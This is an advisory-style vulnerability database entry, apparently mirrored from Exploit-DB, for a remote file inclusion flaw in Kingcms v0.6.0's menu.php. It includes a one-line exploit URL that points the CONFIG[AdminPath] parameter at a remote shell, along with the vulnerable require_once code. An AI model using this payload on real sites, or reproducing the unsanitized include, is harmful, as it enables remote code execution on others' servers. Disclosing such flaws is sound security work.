Kingcms v0.6.0 [menu.php] Remote File Inclusion Vulnerability

vendor:

Kingcms

by:

CoBRa_21

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Kingcms

Affected Version From: 0.6.0

Affected Version To: 0.6.0

Patch Exists: NO

Related CWE: N/A

CPE: a:kingcms:kingcms:0.6.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Kingcms v0.6.0 [menu.php] Remote File Inclusion Vulnerability

A remote file inclusion vulnerability exists in Kingcms v0.6.0, which allows an attacker to include a remote file via the CONFIG[AdminPath] parameter in the menu.php script.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file path.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------
Kingcms v0.6.0 [menu.php] Remote File Inclusion Vulnerability
-------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Mail: uyku_cu[at]windowslive[dot]com
 
Script Download: http://sourceforge.net/projects/kingcms/
 
-------------------------------------------------------------------------------------
 
EXPLOÄ°T:
 
http://localhost/[PATH]/include/engine/content/elements/menu.php? CONFIG[AdminPath] =[SHELL]
 
-------------------------------------------------------------------------------------
BUG:

<?
require_once($CONFIG['AdminPath'] . "/include/engine/folder.php");  

# milw0rm.com [2009-09-01]